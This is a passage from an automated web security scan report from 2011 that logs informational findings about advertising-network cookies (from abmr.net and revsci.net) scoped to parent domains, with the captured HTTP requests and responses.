NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF40mhOQMMpzaxu2F29/z4OklQqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iwLDZ28PQPMyyrjZOFz6kMD0dRNPqA+a+NOCNkQDsHIPW8dxRQAQXa1fXueAOxG/0Ph5A4kA2XsDoDZ3nH70SxSOgmLnV5piixzk5resys4dVLW6cIsXGbtqJjkZE1qcPlKt7p5o6gvMbSPNpaNvziuttXWHwW0FxJedPptpMTggk4ABO6XK1CbHgTrAl44Q1jl+nulDlbMHB4sp6xltYF8ou1fUFa5gGLYoadNG+2aE8YStVrM+iW1ffeM4MijsuH0Fw7h+c4dcikBXQ/p4oyLLrCiJr3ja7/o5kNyjxQOPIl5M9lPt3POR4Wy6zZg5M4EFRjA+CuQPofrTk4qAUgzCLtFJPuYfhR8O4l2pdp+3sl/dkyb2x3Erzgnbzs0LYt2/MqDjVX5XObP54/f/11rx7rPaf7gz3RIADO/vjTkY+DOdmyAJFVgn7tmj3WJoX6xGRog6HEXXWN0sVIe3AIOxe9s0OfXq/4AMQG1w9Rr+4KaXMW2quVxox9BSKounUlQssXFrSc3aE6gH/B0GqapSP6aC5Bc9fMgFWYEoPPHrLmVQ9RN9Ps3h8AYiCn0DzQDV9CktIhI7Dnkb/ZUEo2NaKH; rtc_m5HQ=MLvH+QcJZzpn51KdVPOgNJCILzU6HExCf0rnQftWvcPjLo/2YKTELSxCNMpjfSRckuRm40VIwQCl0sax87YOMDM0e3t1bHewItJgGcBbvpI0MyV5tpKXRhuN1Mawot7ZlJrej/MPx1obCjyiOX0jK9CKU0sifRf9T+1iFVvef3mQJzD4z6YK/bk3ykBdhQIdr1TaW79WKEMYaeckUhtZU0f85OtTcQf37XCOAAIO77yjRkd0B3F+OwRMSzVh8fG7ZD3hH0yRWC7Ht7nI51lqDdw0TLddVCzdUKuU+kokfl041/SVt+sjB+FV4yEp/HgZeJ5LgplhHU0VUy5TTBbTOP9yhki4ubdNzVED+ln7XPT89/EYal0oK/1WtKgG2lmeppMJRNjXOhOwcW1LsRZUTN49INPC0edJ1CDfU3XP9D/JH9H417u+OKsa3OPw53tLrOBGogZhhNLD4sRjGiLYNZWhTpW/yRNhWvzN8rGyfR48OR0ma7RVJ8pTpOcSoxCKK63rJ7CGB/7iAtomceoAQYlQ60aplGhcxGTRtEeIenH8Ea0BputKPjjPLO/baVX8wu9BrGfDEtmIOjmznK/0WsETu5/ky6E/dZ+1eL7O4x+PcTBiOYtVU5oUudsU6pxIoC5SY4ZMiR6OeVv/m0+KzHIgYMbjDbkPxhd91IMY1a/LuRXvq1SetVWprJJ9rFrj2HKRbZBAv6U6LAsQjwz2G5L2o5dd443kVIkkdELv6tMYnhA0Ju//j1W35RwM1EV/Fs5BmHLELzTGxFBTBmWIBDVUC6XN2zRe0PCYS5XeoKd4u+yZe0iISdNoUVSsVwda8XvGfuLOWT8HWVgilE5FJrYpDedtKJlBhMgt+5MmewqmqRt11CiPIV6nDMH3cfJzP2Ec9faJgJCE7NzXC/Am6nmle6pCbwqvXcF0lhIWRmsOFoN2uhpwnVIktlY/ezhY4fePeZrS+QxsyArNM2vUR9Cwm5osh93IME+NQ+BIcB6NI5Z2vpr5y77rGnyzGgCqCbHLbMDQq2mm41zyVBOapSZ/sRH5Q1eetk157+AIrJ5sZFhYQKw+Rp1L2VRj6aHpqbT2Jqkom6FGmDfUar8uCI7zuQ4XwpzK3U3Z/ftle7krFk96r4HfxmjsXDODfIf80/EPssLLVZ0nImFadAgdy/FcrIN/f7x/zRDOqW3ru1+j5Lc1hNS2wsBBdYc/YTgOoA/L0kEpzRacwfXiRLHBKqOllUOG0MFhAigWc6QKOhCaAbAWZ7hTY71cxjnWkeTcXJKa76iwPaX/yMshhMH3Qv7cUuCizD12tHCnB2xfCZvEY1DWDXI5DQqHnnvsISmRPs+4gx1ri7oct6UZPqQCkjfotgdHSvRAwf0bSrlAPGKfYYg2HoHil2+FatCoaH46nC7c9iEobLCP1YIrCs7veG0av3gT4NeqTkGW9Tb+wG4BOIvLPIpX+TCyftX76PACOxaNCGgK60n9fdraGCmILhQ5LoUI0IO1ODxKJGYGZCnDitxP2dmf1yXLPnUCBBUiShMiVcj9MrUx5Tr1Aos1iMwivxVUKrGYxtl/5tUrZUqbUjejioo64qEzjraGY4DgvJlNECNjYaq9k02JIxyqxSZ9lHQLt+aqP8BgzZ8AKkYp5raqPek3oI4liHyPPfzKuM/1VkMuNp5oU65Fs5SNHw5V8sFGi8VcyyyThL1aiLJsvXm9XOZb+qf959PcfIolUyWN7DI1lxpXsbBdH6FjUSHUOQas7m12mPylybqYoywxLkCrnAPACBIHeGxGe5Xm7s0/1sYQGG3rmj2Jc5Vii7uvYrATTY115bByf4rrymKGc4VLy7gY537xpd6pv6BzTqyKDlHkvk28h6PaDBLgGITWvZrA7x2UA7K0/cX5jy1+NbmiCzpXaDDuHv4votJOOD9JXTtbSK7523F/tSYxO8b0vPfasxKKikXilMcuebOBO8gIDBKJia8gZqyKJUYUqoZXruei6Gn7IElty/C8ZO+RkqPulNs0ZMIkl2p7SX+I1946UWnEFkauTsPeCd+NOAQs+dKJyss4fAD/htrKGsStyJ4BxEoXOQd3hMh/u5n7XN+qURZViO6q4hYuLhxEmiqMvgrjwvmtPH8q7VePXEi2mxSxmOC1rElT5w/c7J5joip6SFQb7jb3OREEGeNPzRBZi2tbeQCQ; rsiPus_uDQu="MLsXtSMNZzhvJZGoecXcxPALrEtuUIEnRIwLv6gxPf3XFAdJyu+HVnGXJyr/FnqFiDd/mf29Yndlb/2TnJTVpVVNUdnVcS9WOi3cWgs8Bnb1xfQKjv19bXYhVOe9PIcfFRR2PTLk5K7xrV1h+U1UrXfyI+jlaTBcbDXW4RCJ288ja/CZio731qSYy3y2XrjyBGwGEtTgYd5JC2wcHYKsxUq6H0CkqhBM8PpLvX3UEyR/oyYWGSyOiG+xxZj4kSzOFLoSw7zQEYEXUwCotW1fyHTzH8ipyEfs4Hm9uoCKK+vU7Q++gOLgDnQi+mtAyBi2QA6N2Ayx/8UA/t7xLmB9C5tGGsL+EjDxyRKBAhcEvJyMFGgD9D981RwedKMUviJg1qA+BLHNp0tqm82E1GcTvs4RAQiKp4CWPfk1U1tvfxWanWN0zQQqJlP2qOTThPUN8J29Q2/aTCZ9wKXaXsSrde5tVBza5i3Xfg0IqZPpkH6cjOwIMZWRYixdNCZ39MPULFv3iwy/vWPfcR3I+R7I9cYccABB9lqVnpl7bNO0NY04p07MPh3JlK+jSK3Se9qcuym/tX8dp6nSncntxLA+HdJJUYG+5K1/xrVtW5oHxvOj+1jBYm4aenb1zUpbGpCfkH5CAyEv1aeG18iYDIsv6snGdMOwcMdhy9PNJ1TzKcMq3YJWL86xe4DFrmjQwdHf+3W8wh5nVIaPJme7udNwUazdPoAME+cnobB2mdO34eNsSBRJdhsMwaPiaqmS14AmXY8dnDxYjIcBqB58H6UjYEkeDJVz8onFe1QRuBvStsyvwucZ3IGnwi7VAY+u2zo0V3qt39YV53iRzeWDL/MMxc5ox0NbpBdVU/FEoOqMSJYguNYUxwIi5r9BfkoH5FbpRU/5HwKF7srhgCivsTPSz7PudfB502THT2AzMgx1figTQ2KusANP0vnuB45ypQSVP9Fbn39vjl13BqieTJTV2PTrVjSuQe71wpk3zv6YhotemVEkSQjaGwZRxutMrAz6nXCh7KsrOvO5ayo1RM2kxVqFojXJuTRL1Zcj6M2wAuZg4qW77qthNv7cwOwfPd6clvqsCAwV1IQfEeq7ELdp9nY6iytxJwTCLdxViYImQlT50DGsQR0vFsPFQjepIXeD5FY3L04zo4jmvlvG+ZxG3MDf0cXKasNYPeWZZOmtkk99Rv8hyU+ZCwZVPHsPQdORwCbYNa5oZOa+KuMpGqjt00+vf36Hz+g9nNTbX9qlGiocPb0KD7YJ0M9jPNXAlNE77lKPrXw7OpRUffgl83qkmz0geOZHoMI2QAnRGaPZHOHGWsVgEnH95neTBzk7fZl43fGR6A=="; rsi_us_1000000="pUM1IymnMBYY1A2AKVvIImQRK15PG8YOjOgZPAZG4lG8Ir7fBa1jUAn9GLtouXUM9fzOo3UkOhVL8nuMmGOoQfF+cfFLfy8VU72PuOqjAdJg13lAr0OlVHb2ymalMt6vtyTl4kNtonTxJKVGqmId1CpSTjV2WtFgCwRDxL6wisceGScbvetKK0ARmEo0Jv/6QhwjTU+TlKGfbHHGIaLif3dNQj45z/Cx+U4rTV1hCBYpqi0qkeVRWn4ezNwTDVBark0v2HV3dHc1G/IkKQ/EIGsQCh05cGzi9uS33CUG46OylzHrrScn8g951ii/uwt9lCfChasln/hVHQPoCqMOfbgygy4tmNkZu29sZPZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNUTgW/+ogNJoI5JejwnvSKKtTSMRgATZ6ASfH82CVOAOSDWc+N3dhOuqH9DPbGlNx4Wtyw0rFPJRR3YA1mYjUixZgWJvj7hyx+2qVSbXFoGiStCmpb56IUsi2WHeHHNTFgbHBDdmeC7bTsrQ7MXvpaG+GBmFQ7QWOerx+VTnLgjkj/rVPitF2uA9ei/cbG+qDqE2jShJj/S6XlMCOZSfM9h+VEkH86l0U0mKM5MK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSNqeTG9pwX7uCDFLPHLV3kaBqep6fGSvmko2A2x/J3FB3QzU3wtYWlM5u27FFyaYYHHtTEXARy9KOZ2JI3GkURDvdcvKsoGEYHE1xMN3QYZ0SDeQQ9H98Ag+EfQ/jGpoyzSMCTBMG4Cg92RikJ9i90dX+GGDIzEyQmqvobggZ99Idp+nhfFJ1pTAAsohqJYqeczYOyrxw58M1ALjsNQshiBeceX722dcC8dDh3zf3gGHl2Hk7gBfLSbnQGT8VWC+iP/tvOT6qvay++mLGOoka8n2uBbOpmvjJNrtMFnc0dTlJT6Q6keCE9jKYt3XResMkHJ40xY6g1QQwupGsEXux71coT3HpzF0KO0N1XRQEpnZD2QBBYJkqVmG155x1//AFDOHUYiO6AsC+Sk8E0ks68D1Jyho8ScLyvg4IotUiRR9pdhWDJCIArD3pC/Th7ZvC+eBm1Af05eqCfQiXQJ8/DpDmPdAbcg8aTgNeDicXgP65Y6vh0+e8Uadxc1CNzaO1E8H/dB9Qgx2QN3yCMdVTpFA9cxRmI49OX61+Fsckx/Ij3nU+FzV5ip5ZgPJunDMoNtqwwzbX5SDPbl50X6sDrQewvYPfS3piKXaDOSPSEmkhPZQH8qdcaVTCYs0qpFVolDoHEwsIW30cEQxFMBFwQPy84ypcC3Zme7LW7+iUqdyAdjk2XGe+eLMBCYJtUljdJ6GqBnj+vl//7maBJSUlmqJ3hpC4ce/tJwxaLUfUY1x+nUo95WDfzrRjFlgrJ3xS6+iIIQeVaUhiti+0Cf5eWqLVV+gJE54oXJZkEyJf/sh/kPypmlG32nye5B4XqY5ZAJZXDpJ3QS9rd33I1Vhi6Y1siQdnFT4FCdvZ4R6SzfqmUppApCvr5VHfOQKovoVZagXyk9kuWNCpDBnkxwe3NGXSwYWRPWphnQeFjZJ4h+HR6U53q1Lvc3rPCP4VPxdPZDIqxISUC87tO5crzLyKK+tCDbhL10Y//Xo7+EhPwtM+S5opBVfgwYguoWga8oxUyoHshREvCTUP3Z05DSXeApPRNPZ62ZAxg4BwOYbIaVL9dwygmautbLyGu+K6mv94cUHiQYcr1RjWTE7vkegQWMpJFzB"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uDQu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oTzR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xAcs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kS5A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_KnBd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7TJC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TcLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fPEN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j0gn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uDQu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oTzR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xAcs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kS5A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KnBd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7TJC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TcLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fPEN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j0gn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7v5P="MLsXtSMNJjhvJZGoecXcxPALFPJgPeBnRLSIC5seAoMV0MlXC83mglpihGJj4llhxoQ3e1svCK+Nxl8qmHgwn/tk5yhz0s6gMqepbcTRCTVKOXsG3B4jg4jRNKkMEO8YvDy8XQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsChIEd+PvSVJnpZZitSz0giLAQhMw4bcMP/b5clIE0lk3/0/oNfGYUVyhJYTYKNqdC04jLXj6sg+6cttG5YhAKNaCzpytY2MD7XsGaLOIsKygBOypHF39kCZifEKvoW0Eyb0XpTtKUZvtijmrfYu4Y+OLOp9bwC/g+sEvqdQ7YBDQq2A4My2funJ12sn+7tZG4H6XJo0VgWp/utobRa0NDjGHRtx7x97JW3JoToRv6HeinKdm77VZc7/yBIEFc6+zL9U8yBMSC5qVJC6BmiCG3p1SP2y4sHRxAy34q9Ecsje+TSUOlpFyMBjMnUYT9/hOFsuCRe2vIQrZ5MSqhLPFIxTJvTaBW1KsX1pOUiAWYGS9pksSD4scIDCtx1JyUgOXoGvION+/YfK0snXNBYv3KM8jG93xv9oHY1DaVTBZWZUssM+HRZUtOooU4xm712Uv/Fz3qUnKMSbHqOCpozPFi2MM3ygrH5yaW/Wz9IAwinylx9hP5pJbdqGtVjwmvBpPo3f7li7jIYCPkCzf4DFfN4BbrrOaH1z+toDcALcyin2/Q2cxY8iyzWLLJ9h48jZE6PisUhkH3lMEb8B0oggg4PEHMi/kiIvDrK7kWYVD6l0KBiEFiPW8liklgMJWMgzQ5SA5NXW1yezXNgckLfqNAJ0XcoFh7/KBIGgvT3Pw9moJyLBRKBUPnteLPQ5kzQHE3L2yXzjv94K2/wytxjkPcQo3BfhAidL4HSD8p8ufsoo976t1Mi4JZ4LSgrIVdcXnfqmKBCmEhMq27EmYxqXGBw6lV6BGQUGb18jiP8bLSf1Z6X9u8kyvCGssYXxZT5Aroz64zbC/oaSXuwzdkSV2LtW0RQkqRIEf+Y2xMd4xUxPqiA9JeqH7iPQQsD1KNmwPAfeki9x4iJttcZcvV7yiwVBEEc0eNbqloKy1cK1IBKakMsK8MXb+G/idjMKFm8y6mYrfO2jOzDfNLd7yjJHDGgKaKqZ9jhxo2x9wGOP0UD1LujJZmTv3h1Hl9d9CZdKyaiILPu2rwJA7li6Yu2q0yffEFIhCP69U6/zuFt/hP4kb+cUdsL0KrdaqpJJZYF6m7GM6Y4fy5vS94WLytkb+PiS9/NMjNC69jbzzThAKHk04he9cu13oXmuVQJ0ZgL4WoDnrHgd7ttEbIWlAIt39YJlj7Cy/qXncpZo5IyRsA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1IymnMBYY1A2AKVvIImQRK15PG0ZG8xXiy/jjLaAD3cFM0ipXTUHNBmbDd46t2hFxDCMVaHOYllruChPtX9lmoTB4XTp0MTGlRu7VZ6iPaAiSltSt2n1OgbZyFHS488sOo/WhmpOJJdWIC1K0s80FLO15A2FkUVNzDncLH0dcICW/dcxrzfg7YbyAtEmGLqJjJW1YrsXnMK+8Dhb69Do4jhq6oG41IZqAXDdfUZHNnM88F9wL4iaqAraeydL95l0FPnuO7bNXKn5o5StH+jn+w8XqpWQrG6yeq7rXIJxP4CNtFkTqE5r7kU5vouYl44epaLpLfOq+Kb/sCo+gXcEyYD79pUDOBTdpb5Uh1efWnc1B5EgxmFKfdAKvtDLQ29mkG4JbhtIudkyPO73WA/syaBwDa32I4/prXd+FUBwL1Jw0FxazxyTvN18HOldmtcT4pB3kb6LwczuCpT/ahyrZfTzJ64rl2UDtE7pN8BL3zRkB4rMdQontLuqe7dUprOx7ROmerdYAFdCinwH2eKIE2BOKwyzEgfCVs67btvX7XMw2UZA4nqCGXBqXiZ73rpXk51jkGvYtqqjvy0JT3ELSHVUYsk4dOdiiw9CEcmwldalBOtKuvA72v5XZdzNsCA8wmwhD4SthVu1G8H0be93VnunUNYXBjxDpEsYPMzIcENJPlnhMfhlUhH7A7ED9cdH3GBYv5f5PaBjHG3j0pDTuM+o1gYPyxc6bFXpl55vMMSYqvkp0Cdej0KcVQ1WLoY6TZ/j6CAeQ/PQCPxQcz1D+oT54shoq7Ree+ekhbBl5CnD0F9kvAmAerYc3Ms6ILpvA6xV9PPcS+Nitzn86w83YgY3uqd2MqADtKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8JoURZOCjqiH855mK3sqrup8s9L575P6sOCuy0uqcB937sPRkk8WeCl1IEoqw1kq/Ilu2l8ir8L+96BxhzjjJPPIXONJv/yfSSTUueIht95Jv91sOFK+nJGXCTUII2fRJ711dwf9AIOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XXGDw6ajlb0l+l8bB/mvXv2SILU062vN9JM++YOvmd1hzjtNzhi3UjFJz/IFIgCZBs/BVubNMD9uYYbH6TxxjH+7CdSdlo4qYUX31T6EyVGh01Pxz1+fLgG4rhsPKzVPOXvo3kh/6RpWvM0ajQiSoWnBT5aRMuggA4X8pGS2MZIa+hiIDWj/YvAx1LfX+MgoUN9yvHTPBBw6bSIHKNHg6IgIDZ1cuo2xRfbcsahrLCJLUVylUKNJ1/SIR5UJUrbYWaTldI+BcE61OrZUBx12U2DD79VKGzzuDCa9L37Nah53PjStfRX50kC7FkaKN3VY+yzg9/8KqmKE3sDAPbMDW+EyKUDXqHMGqwMCtQSZ12dEEBu5jvmyS19dxP1JTvnRi0xGBcgfwTwvKoY4i9H3dR+qMN7KKTtNtyA3E0omvuepmPaAullSzXZGTDH70dhHLfWM+MR/VcxVNcs4vflK3QEr/94glwixB8mAR8HTbXIM0pOiIcMuzHzOzyPDvR0j2kSHzYEhjo+gzBKwyojKn5LmUx38X30QJ8HlVJ89wvbdE5kPBDOzM1/YnsetfeVgnrUI83ES6N9UeIBfG0caxdSfg2QNj5SN1Inel3N9oTRHpDrjPcIU4e8nSLjr4NUekYAAtLR/4djBPHM+6YgGS49215SR0yEYUAgbeZySxstQNac2aRaGvSDnSiaV3D"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:33:36 GMT
Content-Length: 1753

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

12.39. http://ak1.abmr.net/is/adopt.imiclk.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/adopt.imiclk.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-6EB1E973CC529A6728E8A773F0CBB70108F6AB411B744A10E247D03071ADCC6B-0DF6FF1A98FE5F3223B958FB56F9E60ED8D0A95886E80532BD5FA1E74AF8C478; expires=Tue, 12-Jun-2012 11:03:14 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/adopt.imiclk.com?U=/emb/q&V=3-CquVylmaP2vHc0GYUEUS38M%2fpjx+BmSOWuUinL3IfOaasSDBQyZJniYg2Bt5bb9f&I=6BDF326C1D1D9D9&D=adopt.imiclk.com&01AD=1&size=160x600&m=3&l=1575606&c=162 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAG5NDABbfDsAAAAAAFbVDwAAAAAAAgAAAAoAAAAAAP8AAAACB7YKGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4ZAYAAAAAAAIAAQAAAAAA7FG4HoXr-T.sUbgehev5PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADj2zl69I-Cp9kMtWtge5DYqRCnjMrzCXUcicpAAAAAA==,,http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F,B%3D10%26Z%3D160x600%26_salt%3D1199747959%26r%3D0%26s%3D806254,b7f8d118-95ac-11e0-934f-d33941452b63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-70CED95D108D2C796D429973C6D39D6E2A0E3E247CEDB65FFC16C13CD8768879-5DF8E70E6E50C00A8FD90058CAE79C28FBECBC0A7071CB3A48D6FE092468BFEA

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://adopt.imiclk.com/emb/q?01AD=2-2-ACBE8638B69B1F1D61960A09DFC6D76C7F2B0A422E2C373C87EBFF28718B0F36-C697E6CF9B71CF8D607557CBF2A3FFF4E1BA92EF9632553E43F308814384DE2F&01RI=6BDF326C1D1D9D9&01NA=&size=160x600&m=3&l=1575606&c=162
Expires: Mon, 13 Jun 2011 11:03:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:14 GMT
Connection: close
Set-Cookie: 01AI=2-2-6EB1E973CC529A6728E8A773F0CBB70108F6AB411B744A10E247D03071ADCC6B-0DF6FF1A98FE5F3223B958FB56F9E60ED8D0A95886E80532BD5FA1E74AF8C478; expires=Tue, 12-Jun-2012 11:03:14 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

12.40. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-C962F508BE5AF06FD18AC05E8D5BBA6BCEF86873CF07F773BC88A059DC559C10-2AFA78C53CBD1FAEA308969CDD72466CA774E2FA1ADE86BF658712314425319E; expires=Tue, 12-Jun-2012 11:01:31 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/js/195/fsv/728x90/ros&V=3-vT+nsKAH0TulQQER%2f%2fVMX+He0nfasJ0gWTacs599KqGw4pGUJzhSFQ%3d%3d&I=D54777EA22B9F46&D=admeld.com&01AD=1&url= HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
